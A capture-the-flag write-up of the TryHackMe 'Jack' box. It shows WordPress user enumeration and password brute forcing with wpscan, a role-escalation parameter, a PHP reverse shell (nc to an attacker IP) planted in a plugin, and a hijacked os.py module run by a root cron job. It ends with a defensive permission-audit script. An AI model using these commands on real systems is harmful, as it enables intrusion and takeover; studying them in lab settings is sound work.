{THM} Jack
Connect to the network and deploy this machine. Add jack.thm to /etc/hosts. This machine is rated hard: the path is to compromise the WordPress web server and then escalate to root through a writable Python module. The machine is very unstable.
As usual, start by scanning the ports and directories. The results show that this machine runs WordPress on its website.
Another clue here: jack is one of the valid users.
Since this site uses WordPress, let's fire up wpscan for more information.
wpscan --url jack.thm -e u
The scan gives us some juicy information. Since we have a valid username, save it into a user file and brute force the password using wpscan.
wpscan -U user -P <path/to/passwordlist> --url http://jack.thm --vv
Once we get the username and password, log in to WordPress.
Initial findings show WordPress 5.3.2, and what makes it interesting is that this user is not an admin, since actions and access on the site are limited. Since the user is not an admin, let's try to give this user the administrator role and look for any related article or exploit.
Yup, I managed to find the vulnerability, and what shocked me is that this vulnerability is old. That means the site is not being patched (I think).
Add &ure_other_roles=administrator
Refresh the dashboard. BOOM! There are a lot more actions and access available than before.
Let's exploit this site by uploading a reverse shell. Since the site does not use a theme that can be exploited, we go through a plugin instead. In the plugin editor we can modify the plugin code: add this reverse shell at the top of it and save.
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.8.xx.xx Port >/tmp/f") ?>
Once we activate the plugin, check our reverse shell listener. From the jack home directory we get the user flag.
Next, let's check and play around with the information found in the jack directory.
Checking the backup directory, there is an interesting id_rsa file. The file belongs to root, yet it has full permissions for everyone (owner, group and others).
Download that folder to our machine and connect using ssh. Before that, change the permissions of id_rsa to owner read/write only (600).
ssh -i id_rsa jack@jack.thm
Since we have access as jack without the password, let's run linpeas to make the job easier and look for ways to escalate to root. I'm checking /opt just in case.
From this information, the task runs every 2 minutes. It works like a crontab but is only visible to root.
Yup, this is exactly what we can use for exploitation. This directory is not supposed to contain any script. Let's check on it.
find / -group family -ls 2>/dev/null
This file runs under python2.7, and jack can modify the os.py module.
Modify it by putting the reverse shell in it, then check our listener after 2 minutes.
We got root access.
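Two of the findings above share one root cause, loose permission bits on files that a privileged process trusts: the world-readable id_rsa in the backup directory and the os.py under the root cron job that jack could modify. As an added example (not part of the original write-up), this Python script audits both conditions from the defender's side; the directory layout and file names it constructs are assumptions, not the box's real paths.

```python
import os
import stat
import tempfile
from typing import Optional, List

WRITE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH
READ_BY_OTHERS = stat.S_IRGRP | stat.S_IROTH


def check_path(path: str, secret: bool = False) -> Optional[str]:
    """Return a reason string if `path` has loose permission bits, else None.

    Any file is flagged when group/others can write it: a root-run script that
    imports a module from here executes whatever they put in it.
    With secret=True (private keys, backups) group/other *read* is flagged too.
    """
    mode = os.lstat(path).st_mode
    if mode & WRITE_BY_OTHERS:
        return "writable by group/others (%s)" % stat.filemode(mode)
    if secret and mode & READ_BY_OTHERS:
        return "secret readable by group/others (%s)" % stat.filemode(mode)
    return None


def audit_module_dir(directory: str) -> List[str]:
    """Names of loose .py files in a directory a root interpreter imports from,
    plus the directory itself if it is writable (new modules could be dropped in)."""
    loose = [n for n in sorted(os.listdir(directory))
             if n.endswith(".py") and check_path(os.path.join(directory, n))]
    if check_path(directory):
        loose.append(os.path.basename(directory) + os.sep)
    return loose


def build_sample() -> dict:
    """Constructed fixture (assumed layout, not the real box): a python2.7 lib dir
    with a world-writable os.py beside a sane socket.py, and a world-readable id_rsa."""
    root = tempfile.mkdtemp()
    lib = os.path.join(root, "lib", "python2.7")
    os.makedirs(lib)
    os.chmod(lib, 0o755)
    for name, mode in (("os.py", 0o666), ("socket.py", 0o644)):
        p = os.path.join(lib, name)
        open(p, "w").close()
        os.chmod(p, mode)
    key = os.path.join(root, "id_rsa")
    open(key, "w").close()
    os.chmod(key, 0o644)
    return {"lib": lib, "key": key}


def demo() -> dict:
    """Run both checks over the fixture and return what each flagged."""
    s = build_sample()
    return {"modules": audit_module_dir(s["lib"]),
            "key": check_path(s["key"], secret=True),
            "sane": check_path(os.path.join(s["lib"], "socket.py"))}
```

Pointing `audit_module_dir` at the real `sys.path` entries of the interpreter a root cron job invokes is the check that would have caught the writable os.py on this box.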
Really stressed by the connection, but finally, after 2 hours and 30 minutes, I managed to get root.
Role permission in WordPress.
Exploit os.py module